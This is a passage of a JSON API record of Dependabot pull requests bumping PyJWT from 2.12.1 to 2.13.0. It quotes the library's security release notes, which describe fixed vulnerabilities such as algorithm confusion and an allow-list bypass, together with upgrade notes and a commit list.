href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nU...\n\n_Description has been truncated_","html_url":"https://github.com/ral-facilities/ldap-jwt-auth/pull/374","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/ral-facilities%2Fldap-jwt-auth/issues/374","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/374/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":"the auth group","pr_created_at":"2026-05-31T02:57:53.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4556387929","node_id":"PR_kwDOSsrJJs7hCN0-","number":7,"state":"open","title":"chore(deps): bump pyjwt from 2.12.1 to 2.13.0 in the auth group","user":"dependabot[bot]","labels":[],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-31T02:57:53.000Z","updated_at":"2026-05-31T02:57:54.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps)","packages":[{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":"the auth group","ecosystem":"pip"},"body":"Bumps the auth group with 1 update: [pyjwt](https://github.com/jpadilla/pyjwt).\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca 